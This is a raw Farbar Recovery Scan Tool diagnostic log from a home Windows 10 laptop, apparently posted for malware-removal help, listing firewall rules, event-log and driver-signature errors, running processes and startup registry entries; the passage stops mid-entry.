(Allow) C:\Program Files\iTunes\iTunes.exe FirewallRules: [{C8D63CDD-CB45-41E6-9676-C5235F513E50}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe FirewallRules: [{A6035642-EFF6-4D3F-A471-8F29A46FE381}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe FirewallRules: [{29458CC2-9F5A-4226-8F16-B8DCC1E9A280}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{9C04F057-2474-485A-B328-06C86CBE9AF6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{8078B494-1CD1-4E93-AF3D-325569171D51}] => (Allow) LPort=50000 FirewallRules: [{A2CCF995-5E8E-4066-80A8-AA998DCA6A80}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{44AEF0DF-9B4D-4FE6-B6E4-2BDE8ABE5EE1}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{3DD8C92C-1E2B-4B13-9BD8-0C413D7304F6}] => (Allow) C:\Users\Kyle Aniel\AppData\Roaming\McAfee\Supportability\MVTLogs\ProductDetection64.exe FirewallRules: [{09095BAF-CFEA-4A62-A961-97CE70C0F14D}] => (Allow) C:\Users\Kyle Aniel\AppData\Roaming\McAfee\Supportability\MVTLogs\ProductDetection64.exe FirewallRules: [{22A807EF-5700-42AB-AD50-A9315FFB0ACF}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe FirewallRules: [{9F5506B2-FE5A-45A6-BE89-593AF24DA79D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{149713C0-3A5B-4BA5-9CEC-10624D856994}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{50A74DE0-4CF0-4436-A417-756FC22CFA0B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{0C08375C-3256-4D97-8C0C-F3B798874E9D}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{87934DC9-BB42-4A76-977F-7DB1AA22CE30}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{81D09C49-FCFC-4576-ADAB-3228E5E5812F}] => (Allow) LPort=1900 FirewallRules: [{0BD45850-ADD6-4FB8-9763-A7803A529714}] => (Allow) LPort=2869 FirewallRules: [{3E5C0A9A-8603-4FD0-9015-B81E4B910642}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{3C2C253A-75CC-4267-90E2-CFA17D99C597}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{80D6559F-AA11-4937-9A76-F8F47B0FA5A9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe FirewallRules: [{63D829A9-1866-46EE-BE65-46FFC2EF34C7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe FirewallRules: [{37F2FF54-CA8C-421C-A6D7-C3E7998F3851}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe FirewallRules: [{035BCD7C-7394-4029-A70D-306939C141B5}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe FirewallRules: [{7DE873A1-B04A-4DC4-BF07-72452AA6769A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{EB8518E6-0C53-4592-A329-17FF4E03C814}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{C4117717-1BF8-4083-B45B-8E65BE340653}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{A009DA25-1808-4BF7-8594-F809220AD544}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{DA464FB2-57C0-4998-85E8-54A7D16F808D}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\FaxApplications.exe FirewallRules: [{31F26292-472F-4FFC-AA3A-0278395E83A7}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\DigitalWizards.exe FirewallRules: [{9BF7603D-8F7C-4E49-ABCC-C7311B6E0DA8}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\SendAFax.exe FirewallRules: [{6026A0A4-DCD7-419C-8407-81503532C00B}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\DeviceSetup.exe FirewallRules: [{A783AA3C-A803-45F8-9270-860CE2C449BC}] => (Allow) LPort=5357 FirewallRules: [{69728B7B-B5FA-48E5-A57A-8AC7AD8CFD35}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [{94C72F18-5920-4207-99C7-3139704D79E1}] => (Allow) LPort=50000 FirewallRules: [{BC519CD9-D5BF-4289-AB5D-F134CBA183D7}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe FirewallRules: [{2646CD7C-C5DA-4EDC-8811-98E05D23D1AF}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe FirewallRules: [{761227BA-3A0B-4783-9D92-5A778653F022}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{A5A81B4C-BC6A-4AB7-8DF4-428AB39C529D}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe FirewallRules: [TCP Query User{0E400244-55F2-4995-BDAF-BE37DE126EA3}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe FirewallRules: [UDP Query User{8C40C563-77CF-4CD6-B606-00A658B175BC}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe FirewallRules: [TCP Query User{AF159B5F-F569-4FC3-A426-0F45CF62F1A6}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe FirewallRules: [UDP Query User{DFC2E528-A381-4BB4-A766-40F096B52695}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe FirewallRules: [TCP Query User{B075427D-FA99-437A-9826-8B8E82766740}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe FirewallRules: [UDP Query User{FCC68B87-C0F9-4AAF-9801-459975C199C8}C:\users\kyle aniel\downloads\airmouse.exe] => (Block) C:\users\kyle aniel\downloads\airmouse.exe FirewallRules: [TCP Query User{B6438A5A-55C1-49AF-8357-63FE07103FF9}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe FirewallRules: [UDP Query User{BECDF835-CCAA-4B58-8415-09AAFE18C14E}C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe] => (Block) C:\users\kyle aniel\pointermouse\jre7\bin\javaw.exe FirewallRules: [{81BF7A2B-4DAC-49CF-AD5D-A6AEB59C2CF4}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exe ==================== Restore Points ========================= 17-10-2016 15:19:58 Windows Update ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (10/20/2016 03:04:30 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Exception code: 0xc0000005 Fault offset: 0x000000000018c781 Faulting process id: 0x970 Faulting application start time: 0x01d22acb7f9951ec Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Report Id: 9eef0189-127d-4119-9c79-773febf82963 Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 05:33:22 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: HPWMISVC.exe, version: 1.4.1.0, time stamp: 0x55910776 Faulting module name: OLEAUT32.dll, version: 10.0.14393.187, time stamp: 0x57cf9bf4 Exception code: 0xc0000005 Fault offset: 0x0001bf74 Faulting process id: 0xb28 Faulting application start time: 0x01d22a692db8f901 Faulting application path: C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe Faulting module path: C:\WINDOWS\System32\OLEAUT32.dll Report Id: a0b2c54f-2d93-4465-b735-0b96d385903d Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 04:53:47 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Exception code: 0xc0000005 Fault offset: 0x000000000018c781 Faulting process id: 0x58a8 Faulting application start time: 0x01d22a629b5fb541 Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Report Id: 38c9a44e-c636-4c63-8c93-8a2cad2d4939 Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 04:53:44 PM) (Source: Application Error) (EventID: 1005) (User: ) Description: Windows cannot access the file for one of the following reasons: there is a problem with the network connection, the disk that the file is stored on, or the storage drivers installed on this computer; or the disk is missing. Windows closed the program gramblr.exe because of this error. Program: gramblr.exe File: The error value is listed in the Additional Data section. User Action 1. Open the file again. This situation might be a temporary problem that corrects itself when the program runs again. 2. If the file still cannot be accessed and - It is on the network, your network administrator should verify that there is not a problem with the network and that the server can be contacted. - It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer. 3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER. 4. If the problem persists, restore the file from a backup copy. 5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for further assistance. Additional Data Error value: 00000000 Disk type: 0 Error: (10/19/2016 04:53:44 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: gramblr.exe, version: 0.0.0.0, time stamp: 0x57fef5a9 Faulting module name: gramblr.exe, version: 0.0.0.0, time stamp: 0x57fef5a9 Exception code: 0xc0000096 Fault offset: 0x0000000000517889 Faulting process id: 0x3838 Faulting application start time: 0x01d22a63a08525c6 Faulting application path: C:\Program Files\Gramblr\gramblr.exe Faulting module path: C:\Program Files\Gramblr\gramblr.exe Report Id: 797dd3f7-6cf2-4fcb-9a98-29a11d223659 Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 04:50:43 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: gramblr.exe, version: 0.0.0.0, time stamp: 0x57fef5a9 Faulting module name: ntdll.dll, version: 10.0.14393.206, time stamp: 0x57dac931 Exception code: 0xc0000005 Fault offset: 0x00000000000485a6 Faulting process id: 0x4558 Faulting application start time: 0x01d22a5ae1da18ae Faulting application path: C:\Program Files\Gramblr\gramblr.exe Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll Report Id: 4c1ae0f6-970a-4bb5-a664-e67a352c0c73 Faulting package full name: Faulting package-relative application ID: Error: (10/19/2016 04:46:35 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: The Open Procedure for service "aspnet_state" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code. Error: (10/19/2016 04:46:35 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: The Open Procedure for service "ASP.NET_4.0.30319" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code. Error: (10/19/2016 04:46:35 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: The Open Procedure for service "ASP.NET" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code. Error: (10/19/2016 04:41:48 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Faulting module name: mfeicfcore.exe, version: 2.6.0.116, time stamp: 0x5211f415 Exception code: 0xc0000005 Fault offset: 0x000000000018c781 Faulting process id: 0x5a5c Faulting application start time: 0x01d22a5e6a333d87 Faulting application path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Faulting module path: C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe Report Id: b2dce35a-28af-4010-97b7-5b8bb880b488 Faulting package full name: Faulting package-relative application ID: System errors: ============= Error: (10/20/2016 03:04:32 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The McAfee Internet Content Filter Core Service service terminated unexpectedly. It has done this 1 time(s). Error: (10/20/2016 03:03:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Windows Connectivity Manager for Gramblr service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 500 milliseconds: Restart the service. Error: (10/20/2016 03:03:17 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The Windows Connectivity Manager for Gramblr service terminated with the following error: Incorrect function. Error: (10/20/2016 06:14:23 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The Interactive Services Detection service terminated with the following error: Incorrect function. Error: (10/20/2016 05:17:56 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY) Description: The server {784E29F4-5EBE-4279-9948-1E8FE941646D} did not register with DCOM within the required timeout. Error: (10/20/2016 05:15:00 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {8D8F4F83-3594-4F07-8369-FC3C3CAE4919} and APPID {F72671A9-012C-4725-9D2F-2A4D32D65169} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (10/20/2016 05:14:03 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The vcs service failed to start due to the following error: Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Error: (10/20/2016 05:14:00 AM) (Source: EventLog) (EventID: 6008) (User: ) Description: The previous system shutdown at 8:02:10 PM on ‎10/‎19/‎2016 was unexpected. Error: (10/19/2016 05:34:25 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY) Description: The server {784E29F4-5EBE-4279-9948-1E8FE941646D} did not register with DCOM within the required timeout. Error: (10/19/2016 05:33:26 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The HPWMISVC service terminated unexpectedly. It has done this 1 time(s). CodeIntegrity: =================================== Date: 2016-10-20 05:14:03.848 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-19 17:30:37.818 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-19 14:36:00.227 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 23:53:53.561 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 20:48:33.285 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 19:51:48.344 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 14:27:52.440 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 13:52:28.063 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-18 13:34:12.922 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-17 14:58:52.353 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-4210U CPU @ 1.70GHz Percentage of memory in use: 46% Total physical RAM: 8122.15 MB Available physical RAM: 4312.15 MB Total Virtual: 9402.15 MB Available Virtual: 5549.66 MB ==================== Drives ================================ Drive c: (Windows) (Fixed) (Total:907.42 GB) (Free:485.65 GB) NTFS Drive d: (RECOVERY) (Fixed) (Total:22.23 GB) (Free:2.5 GB) NTFS ==>[system with boot components (obtained from drive)] ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: DB0E6155) Partition: GPT. ==================== End of Addition.txt ============================
  4. Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016 Ran by banie_000 (administrator) on KYLE-PC (20-10-2016 14:59:12) Running from C:\Users\Kyle Aniel\Downloads Loaded Profiles: Kyle Aniel & banie_000 (Available Profiles: Kyle Aniel & Izach Aniel & banie_000 & Guest) Platform: Windows 10 Home Version 1607 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: IE) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Hewlett-Packard Company) C:\Windows\System32\hpservice.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Autodesk Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (BlueStack Systems, Inc.) C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe () C:\Program Files\Gramblr\gramblr.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hp\HP System Event\HPWMISVC.exe (Intel Corporation) C:\Windows\System32\ibtsiva.exe (Verizon) C:\Program Files (x86)\Verizon\IHA_MessageCenter\Bin\Verizon_IHAMessageCenter.exe (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe (McAfee, Inc.) C:\Windows\System32\mfevtps.exe (McAfee, Inc.) C:\Program Files (x86)\Internet Content Filter\UpdateService.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe (Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe (Sony Corporation) C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exe (McAfee, Inc.) C:\Windows\System32\mfevtps.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe (McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe (McAfee, Inc.) C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe (Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe (Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeature.exe (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe () C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Microsoft Corporation) C:\Windows\System32\InstallAgent.exe (Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe (Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe (Spotify Ltd) C:\Users\Kyle Aniel\AppData\Roaming\Spotify\SpotifyWebHelper.exe (McAfee, Inc.) C:\Program Files (x86)\Internet Content Filter\mfp.exe () C:\Users\Kyle Aniel\Downloads\AirMouse.exe (Flux Software LLC) C:\Users\Kyle Aniel\AppData\Local\FluxSoftware\Flux\flux.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe (Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hp\HP System Event\HPMSGSVC.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.9.829.0\McCSPServiceHost.exe (Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe (Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\CommonBuild\McCBEntAndInstru.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneVideo_3.6.25071.0_x64__8wekyb3d8bbwe\Video.UI.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneMusic_3.6.25021.0_x64__8wekyb3d8bbwe\Music.UI.exe () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_11609.1001.28.0_x64__8wekyb3d8bbwe\WinStore.Mobile.exe () C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1608.2312.0_x64__8wekyb3d8bbwe\Time.exe (Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe (Verizon) C:\Program Files (x86)\Verizon\IHA_MessageCenter\Bin\VzDetectAgent.exe (Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP ENVY 7640 series\Bin\HPNetworkCommunicatorCom.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registry (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8505088 2015-07-03] (Realtek Semiconductor) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech, Inc.) HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard) HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard) HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard) HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500936 2015-04-28] (Adobe Systems Incorporated) HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954296 2015-12-11] (Synaptics Incorporated) HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-04-01] (Hewlett-Packard Company) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [ADSK DLMSession] => C:\Program Files (x86)\Common Files\Autodesk Shared\Autodesk Download Manager\DLMSession.exe [1627032 2014-02-05] (Autodesk, Inc.) HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [493960 2014-12-04] (Autodesk Inc.) HKLM-x32\...\Run: [ICF] => C:\Program Files (x86)\Internet Content 